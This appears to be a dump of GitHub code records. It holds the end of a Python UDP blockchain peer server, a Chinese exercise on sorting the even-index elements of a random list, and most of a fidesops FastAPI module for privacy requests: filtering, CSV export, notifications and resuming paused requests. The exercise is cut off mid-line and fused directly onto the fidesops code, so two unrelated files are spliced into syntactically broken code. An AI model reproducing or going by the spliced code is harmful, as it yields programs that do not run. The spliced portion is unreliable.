ChainContainer(base.Root):\n\n def __init__(self):\n self.chain = blockchain.BlockChain()\n\n def __str__(self) -> str:\n return self.chain.get_data()\n\n def add_block(self, block: block.Block) -> bool:\n ret = True\n try:\n self.chain.add_block(block)\n except blockchain.InconsictentBlockChainException:\n ret = False\n return ret\n\n def add(self, data) -> bool:\n block = self.chain.generate_next_block(data)\n return self.add_block(block)\n\n def get(self, index: int) -> block.Block:\n try:\n return self.chain.blocks[index]\n except IndexError:\n pass\n\n def get_last_index(self) -> int:\n return len(self.chain.blocks)\n\n\nclass NaiveServerBaseState(base.LoggedRoot):\n\n handlers = (\n # 0 - position is msg_type, 1 - prop in global state, 2 - method in specific state\n ('_discover', 'broadcast_handler',),\n ('_discover', 'ping_handler',),\n ('_exchange', 'get_chain_handler',),\n ('_exchange', 'update_clients_handler',),\n )\n\n @classmethod\n def select_msg_handler(cls, state: 'NaiveServerBaseState', msg_type: int) -> callable:\n if msg_type < len(cls.handlers):\n state_instance = getattr(state.root, cls.handlers[msg_type][0])\n handler = getattr(state_instance, cls.handlers[msg_type][1])\n return handler\n return lambda data, address: state.root.log(f\"Handler not found for \"\n f\"{msg_type}{protocol.NaiveMessagesProto.DELIMITER}\"\n f\"{data}({address})\")\n\n def __init__(self, server: 'NaiveServer', root: 'NaiveServerGlobalState') -> None:\n self.server = server\n self.root = root\n\n def handle(self, msg_type: int, data: str, address: str) -> None:\n self.select_msg_handler(self, msg_type)(data, address)\n\n\nclass NaiveServerDiscoverState(NaiveServerBaseState):\n\n BROADCAST_COUNTER_LIMIT = 10\n\n def __init__(self, server: 'NaiveServer', root: 'NaiveServerGlobalState') -> None:\n super().__init__(server, root)\n self._broadcast_counter = self.BROADCAST_COUNTER_LIMIT\n\n def _increment_broadcast(self) -> bool:\n self._broadcast_counter += 1\n if self._broadcast_counter > self.BROADCAST_COUNTER_LIMIT:\n self._broadcast_counter = 0\n return True\n return False\n\n def broadcast_handler(self, data: str, address: str):\n self.server.client.send_ping(protocol.NaiveMessagesProto.DEFAULT_PORT,\n address, self.root.container.get_last_index())\n if self.root.add_node(address, int(data)):\n self.log(f'Handle broadcast from `{address}` with \\'{data}\\'')\n else:\n if self._increment_broadcast():\n self.server.client.send_broadcast(protocol.NaiveMessagesProto.DEFAULT_PORT,\n self.root.container.get_last_index())\n self.log('Send broadcast')\n else:\n self.log(f'Listening broadcast...')\n\n def ping_handler(self, data: str, address: str):\n if self.root.add_node(address, int(data)):\n self.log(f'Handle ping from `{address}` with \\'{data}\\' (add new node or renew existing one)')\n else:\n self.log(f'Handle ping from `{address}` with \\'{data}\\' (do nothing)')\n\n sorted_nodes = sorted(self.root.known_nodes.items(), key=operator.itemgetter(1), reverse=True)\n if self.root.container.get_last_index() < sorted_nodes[0][1]:\n needed_index = self.root.container.get_last_index()\n self.log(f\"Neighbour {sorted_nodes[0][0]} has more \"\n f\"actual chain, synchronizing (needed_index={needed_index})\")\n self.server.client.send_get_chain(protocol.NaiveMessagesProto.DEFAULT_PORT,\n sorted_nodes[0][0], needed_index)\n\n\nclass NaiveServerExchangeState(NaiveServerBaseState):\n\n def get_chain_handler(self, data: str, address: str):\n self.log(f'GET_CHAIN with {data} from {address}')\n self.server.client.send_update_clients(protocol.NaiveMessagesProto.DEFAULT_PORT,\n address, self.root.container.get(int(data)))\n\n def update_clients_handler(self, data: str, address: str):\n self.log(f'UPDATE_CLIENTS with {data} from {address}')\n try:\n new_block = block.Block.deserialize(data)\n except Exception:\n is_added = False\n else:\n is_added = self.root.container.add_block(new_block)\n\n if not is_added:\n self.log(f'Can\\'t add {data}, will try it later')\n\n\nclass NaiveServerGlobalState(NaiveServerBaseState):\n\n DEFAULT_TYPE = -1\n active_state_constructor = namedtuple('ActiveState', ('msg_type', 'data', 'address'))\n\n def __init__(self, server: 'NaiveServer', root=None) -> None:\n super().__init__(server, self)\n self.known_nodes = {'127.0.0.1': 0}\n self.container = ChainContainer()\n self._discover = NaiveServerDiscoverState(server, self)\n self._exchange = NaiveServerExchangeState(server, self)\n self._active_state = self.active_state_constructor(0, 0, '') # listen broadcast\n\n def add_node(self, address: str, weight: int = 0) -> bool:\n if not address or self.known_nodes.get(address) == weight:\n return False\n\n self.known_nodes[address] = weight\n return True\n\n def handle(self, msg_type: int, data: str = None, address: str = None) -> None:\n if msg_type == self.DEFAULT_TYPE:\n super().handle(*self._active_state)\n else:\n super().handle(msg_type, data, address)\n\n\nclass NaiveServer(base.LoggedRoot):\n\n CHUNK_SIZE = 1024\n TIMEOUT = 2\n\n def __init__(self, port: int = protocol.NaiveMessagesProto.DEFAULT_PORT) -> None:\n self.port = port\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.socket.setblocking(0)\n self.socket.bind(('0.0.0.0', self.port))\n self.is_working = True\n self.state = NaiveServerGlobalState(self)\n self.client = client.NaiveClient()\n self.log('Bind', self.socket)\n\n def disable(self):\n self.is_working = False\n\n def _listen(self) -> None:\n while self.is_working:\n self.log('Waiting for data...')\n ready = select.select((self.socket,), tuple(), tuple(), self.TIMEOUT)\n if not ready[0]:\n self.state.handle(NaiveServerGlobalState.DEFAULT_TYPE)\n continue\n\n raw_data, address = self.socket.recvfrom(self.CHUNK_SIZE)\n msg_type, payload = protocol.NaiveMessagesProto.decode(raw_data)\n self.log(':'.join(str(x) for x in address), 'Received data:', raw_data)\n self.state.handle(int(msg_type), payload, address[0])\n\n def listen(self) -> None:\n try:\n self._listen()\n except KeyboardInterrupt:\n self.log(f'Known nodes: {self.state.known_nodes}')\n self.log(f'Blockchain:\\n{self.state.container}')\n\n","repo_name":"irr123/py-naivechain","sub_path":"naivenet/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7443,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"17867404216","text":"'''\n\n编写程序,生成一个包含20个随机整数的列表,\n然后对其中偶数下标(下标即列表元素的索引)的元素进行降序排列,\n奇数下标的元素不变。\n(提示:使用切片。) (20分:生成列表5分,找到偶数下标8分,降序7分)\n\n'''\n\nimport random\n\nlist0 = []\n\nfor i in range(20):\n list0.append(random.randint(1,50)) #生成一个包含20个随机整数的列表\n\nprint('原始序列:',list0)\n# print(len(list0))\n\n# for i in range(0,len(list0),2):\n# for j in range(i+2,len(list0),2):\n# if i < len(list0)-2: #防止下标越界\n#\n# if list0[i] PrivacyRequest:\n \"\"\"Load the privacy request or throw a 404\"\"\"\n logger.info(\"Finding privacy request with id '{}'\", privacy_request_id)\n\n privacy_request = PrivacyRequest.get(db, object_id=privacy_request_id)\n\n if not privacy_request:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=f\"No privacy request found with id '{privacy_request_id}'.\",\n )\n\n return privacy_request\n\n\n@router.post(\n PRIVACY_REQUESTS,\n status_code=HTTP_200_OK,\n response_model=BulkPostPrivacyRequests,\n)\ndef create_privacy_request(\n *,\n db: Session = Depends(deps.get_db),\n config_proxy: ConfigProxy = Depends(deps.get_config_proxy),\n data: conlist(PrivacyRequestCreate, max_items=50) = Body(...), # type: ignore\n) -> BulkPostPrivacyRequests:\n \"\"\"\n Given a list of privacy request data elements, create corresponding PrivacyRequest objects\n or report failure and execute them within the Fidesops system.\n You cannot update privacy requests after they've been created.\n \"\"\"\n return create_privacy_request_func(db, config_proxy, data, False)\n\n\n@router.post(\n PRIVACY_REQUEST_AUTHENTICATED,\n status_code=HTTP_200_OK,\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_CREATE])],\n response_model=BulkPostPrivacyRequests,\n)\ndef create_privacy_request_authenticated(\n *,\n db: Session = Depends(deps.get_db),\n config_proxy: ConfigProxy = Depends(deps.get_config_proxy),\n data: conlist(PrivacyRequestCreate, max_items=50) = Body(...), # type: ignore\n) -> BulkPostPrivacyRequests:\n \"\"\"\n Given a list of privacy request data elements, create corresponding PrivacyRequest objects\n or report failure and execute them within the Fidesops system.\n You cannot update privacy requests after they've been created.\n This route requires authentication instead of using verification codes.\n \"\"\"\n return create_privacy_request_func(db, config_proxy, data, True)\n\n\ndef _send_privacy_request_receipt_message_to_user(\n policy: Optional[Policy],\n to_identity: Optional[Identity],\n service_type: Optional[str],\n) -> None:\n \"\"\"Helper function to send request receipt message to the user\"\"\"\n if not to_identity:\n logger.error(\n IdentityNotFoundException(\n \"Identity was not found, so request receipt message could not be sent.\"\n )\n )\n return\n if not policy:\n logger.error(\n PolicyNotFoundException(\n \"Policy was not found, so request receipt message could not be sent.\"\n )\n )\n return\n request_types: Set[str] = set()\n for action_type in ActionType:\n if policy.get_rules_for_action(action_type=ActionType(action_type)):\n request_types.add(action_type)\n dispatch_message_task.apply_async(\n queue=MESSAGING_QUEUE_NAME,\n kwargs={\n \"message_meta\": FidesopsMessage(\n action_type=MessagingActionType.PRIVACY_REQUEST_RECEIPT,\n body_params=RequestReceiptBodyParams(request_types=request_types),\n ).dict(),\n \"service_type\": service_type,\n \"to_identity\": to_identity.dict(),\n },\n )\n\n\ndef privacy_request_csv_download(\n db: Session, privacy_request_query: Query\n) -> StreamingResponse:\n \"\"\"Download privacy requests as CSV for Admin UI\"\"\"\n f = io.StringIO()\n csv_file = csv.writer(f)\n\n csv_file.writerow(\n [\n \"Status\",\n \"Request Type\",\n \"Subject Identity\",\n \"Custom Privacy Request Fields\",\n \"Time Received\",\n \"Reviewed By\",\n \"Request ID\",\n \"Time Approved/Denied\",\n \"Denial Reason\",\n ]\n )\n privacy_request_ids: List[str] = [r.id for r in privacy_request_query]\n denial_audit_log_query: Query = db.query(AuditLog).filter(\n AuditLog.action == AuditLogAction.denied,\n AuditLog.privacy_request_id.in_(privacy_request_ids),\n )\n denial_audit_logs: Dict[str, str] = {\n r.privacy_request_id: r.message for r in denial_audit_log_query\n }\n\n for pr in privacy_request_query:\n denial_reason = (\n denial_audit_logs[pr.id]\n if pr.status == PrivacyRequestStatus.denied and pr.id in denial_audit_logs\n else None\n )\n\n csv_file.writerow(\n [\n pr.status.value if pr.status else None,\n pr.policy.rules[0].action_type if len(pr.policy.rules) > 0 else None,\n pr.get_persisted_identity().dict(),\n pr.get_persisted_custom_privacy_request_fields(),\n pr.created_at,\n pr.reviewed_by,\n pr.id,\n pr.reviewed_at,\n denial_reason,\n ]\n )\n\n f.seek(0)\n response = StreamingResponse(f, media_type=\"text/csv\")\n response.headers[\n \"Content-Disposition\"\n ] = f\"attachment; filename=privacy_requests_download_{datetime.today().strftime('%Y-%m-%d')}.csv\"\n return response\n\n\ndef execution_and_audit_logs_by_dataset_name(\n self: PrivacyRequest,\n) -> DefaultDict[str, List[Union[\"AuditLog\", \"ExecutionLog\"]]]:\n \"\"\"\n Returns a combined mapping of execution and audit logs for the given privacy request.\n\n Audit Logs are for the entire privacy request as a whole, while execution logs are created for specific collections.\n Logs here are grouped by dataset, but if it is an audit log, it is just given a fake dataset name, here \"Request + status\"\n ExecutionLogs for each dataset are truncated.\n\n Added as a conditional property to the PrivacyRequest class at runtime to\n show optionally embedded execution and audit logs.\n\n An example response might include your execution logs from your mongo db in one group, and execution logs from\n your postgres db in a different group, plus audit logs for when the request was approved and denied.\n \"\"\"\n db: Session = Session.object_session(self)\n all_logs: DefaultDict[str, List[Union[\"AuditLog\", \"ExecutionLog\"]]] = defaultdict(\n list\n )\n\n execution_log_query: Query = db.query(\n ExecutionLog.id,\n ExecutionLog.created_at,\n ExecutionLog.updated_at,\n ExecutionLog.message,\n cast(ExecutionLog.status, sqlalchemy.String).label(\"status\"),\n ExecutionLog.privacy_request_id,\n ExecutionLog.dataset_name,\n ExecutionLog.collection_name,\n ExecutionLog.connection_key,\n ExecutionLog.fields_affected,\n ExecutionLog.action_type,\n null().label(\"user_id\"),\n ).filter(ExecutionLog.privacy_request_id == self.id)\n\n audit_log_query: Query = db.query(\n AuditLog.id,\n AuditLog.created_at,\n AuditLog.updated_at,\n AuditLog.message,\n cast(AuditLog.action.label(\"status\"), sqlalchemy.String).label(\"status\"),\n AuditLog.privacy_request_id,\n null().label(\"dataset_name\"),\n null().label(\"collection_name\"),\n null().label(\"connection_key\"),\n null().label(\"fields_affected\"),\n null().label(\"action_type\"),\n AuditLog.user_id,\n ).filter(AuditLog.privacy_request_id == self.id)\n\n combined: Query = execution_log_query.union_all(audit_log_query)\n\n for log in combined.order_by(ExecutionLog.updated_at.asc()):\n dataset_name: str = log.dataset_name or f\"Request {log.status}\"\n\n if len(all_logs[dataset_name]) > EMBEDDED_EXECUTION_LOG_LIMIT - 1:\n continue\n all_logs[dataset_name].append(log)\n return all_logs\n\n\ndef _filter_privacy_request_queryset(\n db: Session,\n query: Query,\n request_id: Optional[str] = None,\n identity: Optional[str] = None,\n status: Optional[List[PrivacyRequestStatus]] = None,\n created_lt: Optional[datetime] = None,\n created_gt: Optional[datetime] = None,\n started_lt: Optional[datetime] = None,\n started_gt: Optional[datetime] = None,\n completed_lt: Optional[datetime] = None,\n completed_gt: Optional[datetime] = None,\n errored_lt: Optional[datetime] = None,\n errored_gt: Optional[datetime] = None,\n external_id: Optional[str] = None,\n action_type: Optional[ActionType] = None,\n) -> Query:\n \"\"\"\n Utility method to apply filters to our privacy request query.\n\n Status supports \"or\" filtering:\n ?status=approved&status=pending will be translated into an \"or\" query.\n \"\"\"\n if any([completed_lt, completed_gt]) and any([errored_lt, errored_gt]):\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=\"Cannot specify both succeeded and failed query params.\",\n )\n\n validate_start_and_end_filters(\n [\n (created_lt, created_gt, \"created\"),\n (completed_lt, completed_gt, \"completed\"),\n (errored_lt, errored_gt, \"errored\"),\n (started_lt, started_gt, \"started\"),\n ]\n )\n\n if identity:\n hashed_identity = ProvidedIdentity.hash_value(value=identity)\n identities: Set[str] = {\n identity[0]\n for identity in ProvidedIdentity.filter(\n db=db,\n conditions=(\n (ProvidedIdentity.hashed_value == hashed_identity)\n & (ProvidedIdentity.privacy_request_id.isnot(None))\n ),\n ).values(column(\"privacy_request_id\"))\n }\n query = query.filter(PrivacyRequest.id.in_(identities))\n # Further restrict all PrivacyRequests by query params\n if request_id:\n query = query.filter(PrivacyRequest.id.ilike(f\"{request_id}%\"))\n if external_id:\n query = query.filter(PrivacyRequest.external_id.ilike(f\"{external_id}%\"))\n if status:\n query = query.filter(PrivacyRequest.status.in_(status))\n if created_lt:\n query = query.filter(PrivacyRequest.created_at < created_lt)\n if created_gt:\n query = query.filter(PrivacyRequest.created_at > created_gt)\n if started_lt:\n query = query.filter(PrivacyRequest.started_processing_at < started_lt)\n if started_gt:\n query = query.filter(PrivacyRequest.started_processing_at > started_gt)\n if completed_lt:\n query = query.filter(\n PrivacyRequest.status == PrivacyRequestStatus.complete,\n PrivacyRequest.finished_processing_at < completed_lt,\n )\n if completed_gt:\n query = query.filter(\n PrivacyRequest.status == PrivacyRequestStatus.complete,\n PrivacyRequest.finished_processing_at > completed_gt,\n )\n if errored_lt:\n query = query.filter(\n PrivacyRequest.status == PrivacyRequestStatus.error,\n PrivacyRequest.finished_processing_at < errored_lt,\n )\n if errored_gt:\n query = query.filter(\n PrivacyRequest.status == PrivacyRequestStatus.error,\n PrivacyRequest.finished_processing_at > errored_gt,\n )\n if action_type:\n policy_ids_for_action_type = (\n db.query(Rule)\n .filter(Rule.action_type == action_type)\n .with_entities(Rule.policy_id)\n .distinct()\n )\n query = query.filter(PrivacyRequest.policy_id.in_(policy_ids_for_action_type))\n\n return query\n\n\ndef _sort_privacy_request_queryset(\n query: Query, sort_field: str, sort_direction: ColumnSort\n) -> Query:\n if hasattr(PrivacyRequest, sort_field) is False:\n raise HTTPException(\n status_code=HTTP_422_UNPROCESSABLE_ENTITY,\n detail=f\"{sort_field} is not on PrivacyRequest\",\n )\n\n sort_object_attribute = getattr(PrivacyRequest, sort_field)\n sort_func = getattr(sort_object_attribute, sort_direction)\n return query.order_by(nullslast(sort_func()))\n\n\ndef attach_resume_instructions(privacy_request: PrivacyRequest) -> None:\n \"\"\"\n Temporarily update a paused/errored/requires_input privacy request object with instructions from the Redis cache\n about how to resume manually if applicable.\n \"\"\"\n resume_endpoint: Optional[str] = None\n action_required_details: Optional[CheckpointActionRequired] = None\n\n if privacy_request.status == PrivacyRequestStatus.paused:\n action_required_details = privacy_request.get_paused_collection_details()\n\n if action_required_details:\n # Graph is paused on a specific collection\n resume_endpoint = (\n PRIVACY_REQUEST_MANUAL_ERASURE\n if action_required_details.step == CurrentStep.erasure\n else PRIVACY_REQUEST_MANUAL_INPUT\n )\n else:\n # Graph is paused on a pre-processing webhook\n resume_endpoint = PRIVACY_REQUEST_RESUME\n\n elif privacy_request.status == PrivacyRequestStatus.error:\n action_required_details = privacy_request.get_failed_checkpoint_details()\n resume_endpoint = PRIVACY_REQUEST_RETRY\n\n elif privacy_request.status == PrivacyRequestStatus.requires_input:\n # No action required details because this doesn't need to resume from a\n # specific step or collection\n resume_endpoint = PRIVACY_REQUEST_RESUME_FROM_REQUIRES_INPUT\n\n if action_required_details:\n action_required_details.step = action_required_details.step.value # type: ignore\n action_required_details.collection = (\n action_required_details.collection.value if action_required_details.collection else None # type: ignore\n )\n\n privacy_request.action_required_details = action_required_details\n # replaces the placeholder in the url with the privacy request id\n privacy_request.resume_endpoint = (\n resume_endpoint.format(privacy_request_id=privacy_request.id)\n if resume_endpoint\n else None\n )\n\n\n@router.get(\n PRIVACY_REQUESTS,\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_READ])],\n response_model=Page[\n Union[\n PrivacyRequestVerboseResponse,\n PrivacyRequestResponse,\n ]\n ],\n)\ndef get_request_status(\n *,\n db: Session = Depends(deps.get_db),\n params: Params = Depends(),\n request_id: Optional[str] = None,\n identity: Optional[str] = None,\n status: Optional[List[PrivacyRequestStatus]] = FastAPIQuery(\n default=None\n ), # type:ignore\n created_lt: Optional[datetime] = None,\n created_gt: Optional[datetime] = None,\n started_lt: Optional[datetime] = None,\n started_gt: Optional[datetime] = None,\n completed_lt: Optional[datetime] = None,\n completed_gt: Optional[datetime] = None,\n errored_lt: Optional[datetime] = None,\n errored_gt: Optional[datetime] = None,\n external_id: Optional[str] = None,\n action_type: Optional[ActionType] = None,\n verbose: Optional[bool] = False,\n include_identities: Optional[bool] = False,\n include_custom_privacy_request_fields: Optional[bool] = False,\n download_csv: Optional[bool] = False,\n sort_field: str = \"created_at\",\n sort_direction: ColumnSort = ColumnSort.DESC,\n) -> Union[StreamingResponse, AbstractPage[PrivacyRequest]]:\n \"\"\"Returns PrivacyRequest information. Supports a variety of optional query params.\n\n To fetch a single privacy request, use the request_id query param `?request_id=`.\n To see individual execution logs, use the verbose query param `?verbose=True`.\n \"\"\"\n logger.info(\"Finding all request statuses with pagination params {}\", params)\n\n query = db.query(PrivacyRequest)\n query = _filter_privacy_request_queryset(\n db,\n query,\n request_id,\n identity,\n status,\n created_lt,\n created_gt,\n started_lt,\n started_gt,\n completed_lt,\n completed_gt,\n errored_lt,\n errored_gt,\n external_id,\n action_type,\n )\n\n logger.info(\n \"Sorting requests by field: {} and direction: {}\", sort_field, sort_direction\n )\n query = _sort_privacy_request_queryset(query, sort_field, sort_direction)\n\n if download_csv:\n # Returning here if download_csv param was specified\n logger.info(\"Downloading privacy requests as csv\")\n return privacy_request_csv_download(db, query)\n\n # Conditionally embed execution log details in the response.\n if verbose:\n logger.info(\"Finding execution and audit log details\")\n PrivacyRequest.execution_and_audit_logs_by_dataset = property(\n execution_and_audit_logs_by_dataset_name\n )\n else:\n PrivacyRequest.execution_and_audit_logs_by_dataset = property(lambda self: None)\n\n paginated = paginate(query, params)\n\n for item in paginated.items: # type: ignore\n if include_identities:\n item.identity = item.get_persisted_identity().dict()\n\n if include_custom_privacy_request_fields:\n item.custom_privacy_request_fields = (\n item.get_persisted_custom_privacy_request_fields()\n )\n\n attach_resume_instructions(item)\n\n return paginated\n\n\n@router.get(\n REQUEST_STATUS_LOGS,\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_READ])],\n response_model=Page[ExecutionLogDetailResponse],\n)\ndef get_request_status_logs(\n privacy_request_id: str,\n *,\n db: Session = Depends(deps.get_db),\n params: Params = Depends(),\n) -> AbstractPage[ExecutionLog]:\n \"\"\"Returns all the execution logs associated with a given privacy request ordered by updated asc.\"\"\"\n\n get_privacy_request_or_error(db, privacy_request_id)\n\n logger.info(\n \"Finding all execution logs for privacy request {} with params '{}'\",\n privacy_request_id,\n params,\n )\n\n return paginate(\n ExecutionLog.query(db=db)\n .filter(ExecutionLog.privacy_request_id == privacy_request_id)\n .order_by(ExecutionLog.updated_at.asc()),\n params,\n )\n\n\n@router.get(\n PRIVACY_REQUEST_NOTIFICATIONS,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestNotificationInfo,\n dependencies=[\n Security(\n verify_oauth_client,\n scopes=[PRIVACY_REQUEST_NOTIFICATIONS_READ],\n )\n ],\n)\ndef get_privacy_request_notification_info(\n *, db: Session = Depends(deps.get_db)\n) -> PrivacyRequestNotificationInfo:\n \"\"\"Retrieve privacy request notification email addresses and number of failures to trigger notifications.\"\"\"\n info = PrivacyRequestNotifications.all(db)\n\n if not info:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=\"No privacy request notification info found\",\n )\n\n return PrivacyRequestNotificationInfo(\n email_addresses=[x for x in info[0].email.split(EMAIL_JOIN_STRING)],\n notify_after_failures=info[0].notify_after_failures,\n )\n\n\n@router.put(\n PRIVACY_REQUEST_NOTIFICATIONS,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestNotificationInfo,\n dependencies=[\n Security(\n verify_oauth_client,\n scopes=[PRIVACY_REQUEST_NOTIFICATIONS_CREATE_OR_UPDATE],\n )\n ],\n)\ndef create_or_update_privacy_request_notifications(\n *, db: Session = Depends(deps.get_db), request_body: PrivacyRequestNotificationInfo\n) -> PrivacyRequestNotificationInfo:\n \"\"\"Create or update list of email addresses and number of failures for privacy request notifications.\"\"\"\n # If email_addresses is empty it means notifications were turned off and the email\n # information should be deleted from the database. In this situation an empty list\n # of email address is returned along with the notify_after_failures sent from the\n # front end. This allows the first end to control the default notifiy_after_failures\n # number.\n if not request_body.email_addresses:\n all_notes = PrivacyRequestNotifications.all(db)\n try:\n note: PrivacyRequestNotifications = all_notes[0]\n except IndexError:\n pass\n else:\n note.delete(db=db)\n\n return PrivacyRequestNotificationInfo(\n email_addresses=[],\n notify_after_failures=request_body.notify_after_failures,\n )\n\n notification_info = {\n \"email\": EMAIL_JOIN_STRING.join(request_body.email_addresses),\n \"notify_after_failures\": request_body.notify_after_failures,\n }\n info_check: List[PrivacyRequestNotifications] = PrivacyRequestNotifications.all(\n db=db\n )\n info: PrivacyRequestNotifications\n try:\n info = info_check[0]\n except IndexError:\n info = PrivacyRequestNotifications.create(\n db=db,\n data=notification_info,\n )\n else:\n info.update(\n db=db,\n data=notification_info,\n )\n\n return PrivacyRequestNotificationInfo(\n email_addresses=info.email.split(\", \"),\n notify_after_failures=info.notify_after_failures,\n )\n\n\n@router.put(\n REQUEST_PREVIEW,\n status_code=HTTP_200_OK,\n response_model=List[DryRunDatasetResponse],\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_READ])],\n)\ndef get_request_preview_queries(\n *,\n db: Session = Depends(deps.get_db),\n dataset_keys: Optional[List[str]] = Body(None),\n) -> List[DryRunDatasetResponse]:\n \"\"\"Returns dry run queries given a list of dataset ids. If a dataset references another dataset, both dataset\n keys must be in the request body.\"\"\"\n dataset_configs: List[DatasetConfig] = []\n if not dataset_keys:\n dataset_configs = DatasetConfig.all(db=db)\n if not dataset_configs:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=\"No datasets could be found\",\n )\n else:\n for dataset_key in dataset_keys:\n dataset_config = DatasetConfig.get_by(\n db=db, field=\"fides_key\", value=dataset_key\n )\n if not dataset_config:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=f\"No dataset with id '{dataset_key}'\",\n )\n dataset_configs.append(dataset_config)\n try:\n connection_configs: List[ConnectionConfig] = []\n for dataset in dataset_configs:\n connection_config: Optional[ConnectionConfig] = ConnectionConfig.get(\n db=db, object_id=dataset.connection_config_id\n )\n if connection_config:\n connection_configs.append(connection_config)\n\n try:\n dataset_graph: DatasetGraph = DatasetGraph(\n *[dataset.get_graph() for dataset in dataset_configs]\n )\n except ValidationError as exc:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"{exc}. Make sure all referenced datasets are included in the request body.\",\n )\n\n identity_seed: Dict[str, str] = {\n k: \"something\" for k in dataset_graph.identity_keys.values()\n }\n traversal: Traversal = Traversal(dataset_graph, identity_seed)\n queries: Dict[CollectionAddress, str] = collect_queries(\n traversal,\n TaskResources(EMPTY_REQUEST, Policy(), connection_configs, db),\n )\n return [\n DryRunDatasetResponse(\n collectionAddress=CollectionAddressResponse(\n dataset=key.dataset, collection=key.collection\n ),\n query=value,\n )\n for key, value in queries.items()\n ]\n except TraversalError as err:\n logger.info(\"Dry run failed: {}\", err)\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=\"Dry run failed\",\n )\n\n\n@router.post(\n PRIVACY_REQUEST_RESUME,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestResponse,\n)\ndef resume_privacy_request(\n privacy_request_id: str,\n *,\n db: Session = Depends(deps.get_db),\n webhook: PolicyPreWebhook = Security(\n verify_callback_oauth, scopes=[PRIVACY_REQUEST_CALLBACK_RESUME]\n ),\n webhook_callback: PrivacyRequestResumeFormat,\n) -> PrivacyRequestResponse:\n \"\"\"Resume running a privacy request after it was paused by a Pre-Execution webhook\"\"\"\n privacy_request = get_privacy_request_or_error(db, privacy_request_id)\n # We don't want to persist derived identities because they have not been provided\n # by the end user\n privacy_request.cache_identity(webhook_callback.derived_identity) # type: ignore\n\n if privacy_request.status != PrivacyRequestStatus.paused:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Invalid resume request: privacy request '{privacy_request.id}' status = {privacy_request.status.value}.\", # type: ignore\n )\n\n logger.info(\n \"Resuming privacy request '{}' from webhook '{}'\",\n privacy_request_id,\n webhook.key,\n )\n\n privacy_request.status = PrivacyRequestStatus.in_processing\n privacy_request.save(db=db)\n\n queue_privacy_request(\n privacy_request_id=privacy_request.id,\n from_webhook_id=webhook.id,\n )\n return privacy_request # type: ignore[return-value]\n\n\ndef validate_manual_input(\n manual_rows: List[Row],\n collection: CollectionAddress,\n dataset_graph: DatasetGraph,\n) -> None:\n \"\"\"Validate manually-added data for a collection.\n\n The specified collection must exist and all fields must be previously defined.\n \"\"\"\n for row in manual_rows:\n for field_name in row:\n if not dataset_graph.nodes[collection].contains_field(\n lambda f: f.name == field_name # pylint: disable=W0640\n ):\n raise HTTPException(\n status_code=HTTP_422_UNPROCESSABLE_ENTITY,\n detail=f\"Cannot save manual rows. No '{field_name}' field defined on the '{collection.value}' collection.\",\n )\n\n\ndef resume_privacy_request_with_manual_input(\n privacy_request_id: str,\n db: Session,\n expected_paused_step: CurrentStep,\n manual_rows: List[Row] = [],\n manual_count: Optional[int] = None,\n) -> PrivacyRequest:\n \"\"\"Resume privacy request after validating and caching manual data for an access or an erasure request.\n\n This assumes the privacy request is being resumed from a specific collection in the graph.\n \"\"\"\n privacy_request: PrivacyRequest = get_privacy_request_or_error(\n db, privacy_request_id\n )\n if privacy_request.status != PrivacyRequestStatus.paused:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Invalid resume request: privacy request '{privacy_request.id}' \" # type: ignore\n f\"status = {privacy_request.status.value}. Privacy request is not paused.\",\n )\n\n paused_details: Optional[\n CheckpointActionRequired\n ] = privacy_request.get_paused_collection_details()\n if not paused_details:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Cannot resume privacy request '{privacy_request.id}'; no paused details.\",\n )\n\n paused_step: CurrentStep = paused_details.step\n paused_collection: Optional[CollectionAddress] = paused_details.collection\n\n if paused_step != expected_paused_step:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Collection '{paused_collection}' is paused at the {paused_step.value} step. Pass in manual data instead to \"\n f\"'{PRIVACY_REQUEST_MANUAL_ERASURE if paused_step == CurrentStep.erasure else PRIVACY_REQUEST_MANUAL_INPUT}' to resume.\",\n )\n\n datasets = DatasetConfig.all(db=db)\n dataset_graphs = [dataset_config.get_graph() for dataset_config in datasets]\n dataset_graph = DatasetGraph(*dataset_graphs)\n\n if not paused_collection:\n raise HTTPException(\n status_code=HTTP_422_UNPROCESSABLE_ENTITY,\n detail=\"Cannot save manual data on paused collection. No paused collection saved'.\",\n )\n\n node: Optional[Node] = dataset_graph.nodes.get(paused_collection)\n if not node:\n raise HTTPException(\n status_code=HTTP_422_UNPROCESSABLE_ENTITY,\n detail=f\"Cannot save manual data. No collection in graph with name: '{paused_collection.value}'.\",\n )\n\n if paused_step == CurrentStep.access:\n validate_manual_input(manual_rows, paused_collection, dataset_graph)\n logger.info(\n \"Caching manual access input for privacy request '{}', collection: '{}'\",\n privacy_request_id,\n paused_collection,\n )\n privacy_request.cache_manual_access_input(paused_collection, manual_rows)\n\n elif paused_step == CurrentStep.erasure:\n logger.info(\n \"Caching manually erased row count for privacy request '{}', collection: '{}'\",\n privacy_request_id,\n paused_collection,\n )\n privacy_request.cache_manual_erasure_count(paused_collection, manual_count) # type: ignore\n\n logger.info(\n \"Resuming privacy request '{}', {} step, from collection '{}'\",\n privacy_request_id,\n paused_step.value,\n paused_collection.value,\n )\n\n privacy_request.status = PrivacyRequestStatus.in_processing\n privacy_request.save(db=db)\n\n 